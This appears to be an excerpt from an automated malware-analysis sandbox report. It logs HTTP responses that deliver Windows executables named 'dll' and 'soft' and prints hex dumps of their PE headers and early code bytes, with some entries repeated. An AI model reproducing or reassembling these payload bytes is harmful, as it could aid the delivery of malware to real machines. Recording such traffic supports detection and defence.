00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 14:49:15 GMTETag: "1a6c00-62f4906e8de7c"Accept-Ranges: bytesContent-Length: 1731584Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 44 00 00 04 00 00 88 28 1b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6a 70 67 62 65 74 72 00 e0 19 00 00 40 2a 00 00 dc 19 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 71 6d 69 6d 6d 6e 6e 00 20 00 00 00 20 44 00 00 06 00 00 00 44 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 44 00 00 22 00 00 00 4a 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 23 Feb 2025 13:15:18 GMTETag: "6b400-62ecf03da2580"Accept-Ranges: bytesContent-Length: 439296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 b7 9f 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c4 45 00 00 d8 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 10 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ea f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 14:48:42 GMTETag: "eaa00-62f4904f2dcaf"Accept-Ranges: bytesContent-Length: 961024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3a 1e c3 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 d0 b4 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 48 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:40 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:42 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1011200Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 15 b0 99 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5a 0e 00 00 12 01 00 00 00 00 00 2a 79 0e 00 00 20 00 00 00 80 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 78 0e 00 4f 00 00 00 00 80 0e 00 6c 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 0c 00 00 00 bc 78 0e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 0e 00 00 20 00 00 00 5a 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6c 0e 01 00 00 80 0e 00 00 10 01 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0f 00 00 02 00 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 79 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 00 7d 00 00 6c 41 00 00 01 00 00 00 54 00 00 06 6c be 00 00 50 ba 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 33 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 43 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 ad 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 c1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cf 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 e1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 15 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:52 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:53 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1011200Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 15 b0 99 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5a 0e 00 00 12 01 00 00 00 00 00 2a 79 0e 00 00 20 00 00 00 80 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 78 0e 00 4f 00 00 00 00 80 0e 00 6c 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 0c 00 00 00 bc 78 0e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 0e 00 00 20 00 00 00 5a 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6c 0e 01 00 00 80 0e 00 00 10 01 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0f 00 00 02 00 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 79 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 00 7d 00 00 6c 41 00 00 01 00 00 00 54 00 00 06 6c be 00 00 50 ba 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 33 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 43 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 ad 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 c1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cf 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 e1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 15 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
